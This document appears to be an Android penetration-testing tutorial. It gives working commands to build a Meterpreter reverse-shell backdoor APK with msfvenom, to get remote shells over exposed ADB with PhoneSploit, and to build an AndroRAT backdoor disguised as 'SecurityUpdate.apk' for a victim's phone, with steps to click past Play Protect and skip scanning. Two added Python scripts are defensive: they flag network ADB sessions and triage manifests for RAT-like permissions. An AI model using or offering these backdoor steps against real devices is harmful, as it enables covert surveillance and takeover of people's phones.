Mobile Devices

Metasploit - Android Backdoor

To create an Android Meterpreter reverse_tcp backdoor using Metasploit, follow these steps:

  1. Generate the Backdoor:

    Open your terminal and enter the following command:

    msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=<Attacker IP> R > Desktop/Backdoor.apk

    Explanation: This command generates a reverse Meterpreter application for Android and saves it as "Backdoor.apk" on your desktop.

  2. Set Up the Listener:

    Open Metasploit with msfconsole, then enter the following in the Metasploit console:

    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST <Attacker IP>
    set LPORT <Attacker Port>
    run

    LHOST and LPORT must match the values the payload was built with; the msfvenom command above sets no LPORT, so the payload uses the default of 4444.

  3. Install the Application:

    • Transfer the generated "Backdoor.apk" to the target Android device and install it. Once installed, you will see an "App installed" notification. Click "OPEN."

    • Note that a "Blocked by Play Protect" pop-up may appear. Click "INSTALL ANYWAY" to proceed with the installation.

    • If a "send app for scanning?" pop-up appears, click "DON'T SEND" to bypass the scanning process.

Android Debug Bridge (ADB) and PhoneSploit

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates a variety of device actions such as installing and debugging apps, and provides access to a Unix shell that you can use to run several different commands on a device.

Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server at TCP port 5555 on the device.

PhoneSploit is a tool for remote ADB exploitation written in Python 3.

Example of remote shell

Install ADB and PhoneSploit:

apt install adb
git clone https://github.com/aerosol-can/PhoneSploit

Navigate to the PhoneSploit directory:

cd PhoneSploit

Install the required dependency using Python3:

python3 -m pip install colorama

Launch PhoneSploit by running:

python3 phonesploit.py

In the PhoneSploit menu, type '3' to select the option for connecting a new phone.

When prompted to enter the target Android device's IP address, provide the IP address.

The target Android device will connect through port number 5555.

Back in the main menu, type '4' to access the shell on the target phone.

When prompted to enter a device name, type the target Android device's IP address.

You'll now have a shell command line.
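The wireless ADB sessions described above show up in the output of adb devices -l as serials of the form host:port rather than a USB serial. The following Python script is an added example for the defender side (it is not part of ADB or PhoneSploit): it parses that output and lists every device attached over TCP/IP, which is how you would spot an unexpected network ADB session on an analyst workstation. The sample output embedded in the script is constructed for the example, not captured from real devices.

```python
"""Audit `adb devices -l` output for devices attached over TCP/IP.

Added example, not part of ADB or PhoneSploit. The sample output below is
constructed for illustration and does not describe real devices.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of `adb devices -l` output (not real devices).
SAMPLE_ADB_OUTPUT = """\
List of devices attached
ABC123XYZ              device usb:1-1 product:walleye model:Pixel_2 transport_id:1
192.168.1.20:5555      device product:sdk_gphone_x86 model:sdk_gphone_x86 transport_id:2
10.0.0.7:5555          unauthorized transport_id:3
emulator-5554          offline
"""

# A serial that is really a network endpoint has the shape host:port.
_TCP_SERIAL = re.compile(r"^(?P<host>[\w.\-]+):(?P<port>\d{1,5})$")


@dataclass(frozen=True)
class AdbDevice:
    serial: str
    state: str             # device / unauthorized / offline / ...
    host: Optional[str]    # set only for TCP/IP connections
    port: Optional[int]


def parse_adb_devices(output: str) -> List[AdbDevice]:
    """Turn the text printed by `adb devices -l` into AdbDevice records."""
    devices = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("List of devices"):
            continue
        # First token is the serial, second is the connection state; the
        # remaining key:value fields (product, model, transport_id) are ignored.
        serial, state, *_ = line.split()
        m = _TCP_SERIAL.match(serial)
        devices.append(AdbDevice(
            serial=serial,
            state=state,
            host=m["host"] if m else None,
            port=int(m["port"]) if m else None,
        ))
    return devices


def network_adb_sessions(output: str) -> List[AdbDevice]:
    """Return only the devices reached over TCP/IP, whatever their state."""
    return [d for d in parse_adb_devices(output) if d.host is not None]


if __name__ == "__main__":
    for d in network_adb_sessions(SAMPLE_ADB_OUTPUT):
        print(f"wireless ADB session: {d.host}:{d.port} state={d.state}")
```

To run it against a real host, pipe the output of adb devices -l into network_adb_sessions instead of SAMPLE_ADB_OUTPUT. An "unauthorized" entry over TCP means a host has reached adbd on port 5555 but has not yet been accepted by the device's RSA-key prompt, which is still worth investigating.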

AndroRAT

AndroRAT is a tool created with the aim of granting remote control of an Android system to a user, while also enabling the retrieval of various information from the target device. This software operates as a client/server application, with the client side developed in Java for Android and the server component implemented in Python.

It offers a persistent backdoor on the targeted device, automatically launching itself on device boot. Once active, it can collect data including the device's current location, SIM card information, IP address, and MAC address.

  1. Install:

    git clone https://github.com/karma9874/AndroRAT.git
    cd AndroRAT
    pip install -r requirements.txt

  2. Create the APK file (here, SecurityUpdate.apk):

    python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk

  3. Transfer the APK to the victim's device.

  4. Start listening for the victim's device:

    python3 androRAT.py --shell -i 0.0.0.0 -p 4444

  5. Once the APK is installed and opened on the victim's Android device, you'll have a remote shell.
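Both the Metasploit backdoor from the first section and the AndroRAT client above are delivered as an APK that the user is persuaded to install, and the text attributes to AndroRAT the behaviours a triage analyst looks for: starting at boot, reading location and SIM data, and talking back over the network. The following Python script is an added example for static triage (it is not code from AndroRAT or Metasploit). It assumes the APK's AndroidManifest.xml has already been decoded to plain XML, for instance with apktool, since the manifest inside an APK is binary XML; the manifest embedded in the script is constructed for the example and does not come from a real app.

```python
"""Static triage of a decoded AndroidManifest.xml for RAT-like capabilities.

Added example, not code from AndroRAT or Metasploit. Assumes the manifest has
been decoded to plain XML (e.g. with apktool). The sample manifest below is
constructed for illustration and is not taken from a real application.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"   # ElementTree form of android:name

# Constructed manifest resembling a persistent, data-collecting backdoor.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.securityupdate">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <application android:label="Security Update">
    <activity android:name=".MainActivity"/>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Capability indicator -> permissions that establish it (any one suffices).
INDICATORS = {
    "boot_persistence": {"android.permission.RECEIVE_BOOT_COMPLETED"},
    "location": {"android.permission.ACCESS_FINE_LOCATION",
                 "android.permission.ACCESS_COARSE_LOCATION"},
    "sim_or_phone_identity": {"android.permission.READ_PHONE_STATE",
                              "android.permission.READ_PHONE_NUMBERS"},
    "audio_capture": {"android.permission.RECORD_AUDIO"},
    "camera": {"android.permission.CAMERA"},
    "sms": {"android.permission.READ_SMS", "android.permission.SEND_SMS",
            "android.permission.RECEIVE_SMS"},
    "network": {"android.permission.INTERNET"},
}


def permissions(root):
    """Set of permission names requested via <uses-permission>."""
    return {e.get(NAME) for e in root.iter("uses-permission")}


def boot_receivers(root):
    """Names of <receiver> components whose intent-filter includes BOOT_COMPLETED."""
    found = []
    for recv in root.iter("receiver"):
        actions = {a.get(NAME) for a in recv.iter("action")}
        if "android.intent.action.BOOT_COMPLETED" in actions:
            found.append(recv.get(NAME))
    return found


def triage_manifest(xml_text):
    """Return the package name, matched indicators and a simple count score."""
    root = ET.fromstring(xml_text)
    perms = permissions(root)
    hits = {name for name, needed in INDICATORS.items() if perms & needed}
    receivers = boot_receivers(root)
    # The permission alone only allows boot start; a registered receiver
    # is what actually wires the app to launch on boot, so record it too.
    if receivers:
        hits.add("boot_receiver_declared")
    return {
        "package": root.get("package"),
        "indicators": sorted(hits),
        "boot_receivers": receivers,
        "score": len(hits),
    }


if __name__ == "__main__":
    print(triage_manifest(SAMPLE_MANIFEST))
```

A high score is a reason to look closer, not a verdict: legitimate apps also request location or phone state. The combination of a boot receiver, identity and location permissions, and network access in an app named like a system update is the pattern to escalate.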
